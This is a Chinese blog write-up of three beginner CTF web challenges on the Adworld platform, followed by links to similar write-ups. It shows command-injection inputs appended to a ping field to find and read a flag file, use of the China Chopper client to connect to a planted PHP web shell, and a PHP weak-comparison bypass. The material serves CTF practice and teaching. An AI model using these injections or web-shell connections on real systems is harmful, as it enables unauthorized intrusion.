攻防世界WEB部分write up

最新推荐文章于 2023-02-08 18:04:36 发布
最新推荐文章于 2023-02-08 18:04:36 发布
阅读量284 收藏
点赞数
分类专栏: CTF 文章标签: CTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuaicenglou3032/article/details/104254919
版权

新手入门区域

1.command_execution

小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。

wp:

输入127.0.0.1;ls,发现可执行后面的ls,故直接用find命令查找:127.0.0.1;find / -name '*flag*'

看到/home/flag.txt ,于是输入:127.0.0.1;cat /home/flag.txt 拿到flag:

cyberpeace{c9ed5c3cdb8d1e9c140ca4457d6e2412}

2.webshell 

小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。

wp:

我的场景ip地址是http://111.198.29.45:33638

直接上中国菜刀连接http://111.198.29.45:33638/index.php,参数填shell

然后打开终端,ls--->cat flag.txt拿到flag:cyberpeace{ea8df082fd193ea320849f101f4fbf57}

3.simple_php

小宁听说php是最好的语言,于是她简单学习之后写了几行php代码

给出了比较逻辑:

<?php 
show_source(__FILE__); 
include("config.php"); 
$a=@$_GET['a']; 
$b=@$_GET['b']; 
if($a==0 and $a){ 
    echo $flag1; 

if(is_numeric($b)){ 
    exit(); 

if($b>1234){ 
    echo $flag2; 

?> 

wp:

第一个参数a可以等于0也可以等于'',因为是弱类型比较。

第二个参数b首先判断是否是数字,那就在数字后面加字母就不是数字了。

然后只需要比1235大就行

故参数a=''&b=1236qwe

拿到flag:Cyberpeace{647E37C7627CC3E4019EC69324F66C7C}

KogRow(接毕设和大作业版)
关注
专栏目录
XCTF(攻防世界)—进阶webWrite Up(一)
Lemon's blog
08-20 1807
前言:这段时间做了一些XCTFweb进阶题,真的是学习到了很多知识,就来总结一下。 Cat 一开始以为是命令注入,恰好最近学习了命令注入,就先来测试一下: 输入127.0.0.1,发现是可以ping通的 输入127.0.0.1 | phpinfo() 或127.0.0.1 & net user就会显示: Invalid URL 看来命令注入的方法是行不通的(其他连接符也被过滤了,如...
攻防世界 web高手进阶区 8分题 filemanager
闵行小鱼塘
10-04 1188
继续ctf的旅程,开始攻防世界web高手进阶区的8分题,本文是filemanager的writeup
攻防世界writeup
飞鱼的企鹅的博客
01-04 870
攻防世界 confusion1 第一次接触这样的漏洞,认真学习了一波 0x00题目介绍 打开是一个网站,有登陆注册功能,正中间还有一张图片(后来才知道代表php vs python) 但是点击登陆注册都显示404,就很迷了,之后又去扫描了网站,并没有发现什么有用的东西 偶然间查看页面源代码,发现了端倪 这个404界面暗藏玄机啊!但还是不知道怎么做这道题 0xo1查阅资料 其实就是查看wp…...
攻防世界Web练习区Writeup
weixin_42831646的博客
11-07 3377
一些工具 burpsuite SwitchyOmega:Chrome用的代理插件 view_source flag: cyberpeace{c0bffec917b3e51ebf26546ac2c88e79} Writeup 这个题打开之后右键没有反应,直接F12 robots flag: cyberpeace{829baa53f19972442c21944e8205697f} 首先介绍一下Robots是做什么的 Robots简介 1 什么是robots协议? robots协议也叫robots.txt(统一
攻防世界-入门12-Writeup
weixin_47848880的博客
02-08 311
攻防世界入门Writeup
攻防世界web练习18、19、20
H_S2022的博客
07-13 240
攻防世界web练习
第二届广东大学生网络安全攻防大赛 个人向Write Up
hfv13的博客
05-22 1861
第二届广东大学生网络安全攻防大赛 个人向Write Up
[CTF] 攻防世界MISC高手区部分题目WriteUp
qq_37969220的博客
11-26 3698
记录一些有意思的题目 目录索引双色块flag_universe3-11互相伤害!!!Miscellaneous-300intoUJust-No-OneDiskpicture2MulTzor未完待续... 双色块 下载附件解压出来是个gif文件,仔细观察一下,发现两种色块应该分别代表01。写段Python脚本把数据提取出来 from PIL import Image # 读取图片 image = Image.open('C:\\Users\\28919\\Desktop\\out.gif') # 存放分离出的
ctf 攻防世界练习题writeup(第二部分)
Ohh24的博客
09-07 908
ctf 攻防世界web2cookie新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 cookie 由题可知本题考查cookie,那么什么是cookie? 新的改变 我们对Markdown编辑器进行了一些功能拓展与
WriteUp-攻防世界-MISC Become_a_Rockstar
weixin_57806437的博客
05-27 1236
附件为Become_a_Rockstar.rock Leonard Adleman says star Problem Makers is Problem Makers Problem Makers says NCTF{ God takes World A boy says flag The boy is Bob Evil takes your mind A girl says no flag The girl is Alice Truths were ctf hoster violently F
攻防世界web练习区write up
GZWZ_的博客
04-02 1045
虽然我立志成为一名优秀的web手,但真的好难,九敏!!!求一位志同道合的web小伙伴,一起讨论,一起进步哇!(大佬也没事,求带!!)
攻防世界writeup——Web(持续更新)
Lethe's Blog
08-12 8275
lottery(XCTF 4th-QCTF-2018) 打开题目先注册,然后发现flag可以购买。但得先去买彩票赢得足够的钱,七位数字的彩票,猜中的位数越多,赢得的钱越多,因此应该在买彩票这里出了一些漏洞。 1、首先访问目录robots.txt,存在.git泄露。 2、利用工具GitHack,得到网站源码: 3、进行代码审计,问题出现在api.php里的buy函数,这个函数就是用来判断是否猜...
攻防世界String Writeup
只影的博客
03-04 2343
这道题暂且认为是攻防世界pwn新手区比较难的一道题,而难点主要在于读懂题目,读懂后就比较简单了。 查看程序的防御机制,发现除了PIE全开。从题目string可猜测,应该是个格式化字符串的漏洞。可以在Linux中先将程序跑一遍,对程序的流程和分支有个大概了解,本题是个简单的D&D类型的游戏题目。 用ida对程序进行分析,顺着程序的流程走,可以看到在sub_400BB9中有printf(&am...
攻防世界web新手writeup
qq_42912607的博客
11-03 277
1,view_source F12查看源代码,注释中获取flag 2,get_post get提交a=1 火狐hackbar工具Post提交后获得flag 3,robots robots.txt后 f1ag_1s_h3re.php 4,backup 提示index.php的备份文件 后缀为.bak 下载后记事本打开获取flag 5,cookie burp抓包需要cookie.php, 加载Url后...
ctf攻防世界练习题writeup(第一部分
Ohh24的博客
09-01 1109
view source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 用火狐浏览器打开对应网站 发现无法找到对应的flag,此时可以按F12寻找相应的flag 同时,根据题目的提示,也可以搜索view-source:http://相应的网站/进行访问,寻找flag get_post 先用火狐打开相应的网站搜索 根据提示用get方式提交名为a,值为1的变量,...
攻防世界web入门级writeup
weixin_52083155的博客
07-23 286
攻防世界web入门级writeup 1、给出的题目链接进去,F12就可以看源码,就可以看到flag. 2、 了解到什么是robots [原理] robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。当一个搜索蜘蛛访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。 第一步访问源代码,发现什么都没有 第二步访问robots 文件,找到有关flag
攻防世界mfw_攻防世界--web高级writeup
weixin_29963537的博客
01-14 209
根据大佬们的writeup作出来后,自我整理下知识点及分类php目录htmlmfw git泄露app 注意 page=about ,能够传数据且用git写可能有git泄露传flag为空,表明有文件,若是报错,是没有webstorm git泄露函数 查看flag.php没有东西查看index.php page没有通过任何过滤和处理,因此能够传递参数闭合strpos函数设置page为'.system...
攻防世界web高手区writeup
a370793934的专栏
11-27 1817
Cat django报错 ctrl+u查看源码,发现input name=url ?url=%79 发现有url转换,转换成w,在输入=%80(ascii码表第%80不存在)报错 Django使用的是gbk编码,超过%F7的编码不在gbk中有意义 当CURLOPT_SAFE_UPLOAD为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读...
攻防世界web fileclude
最新发布
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值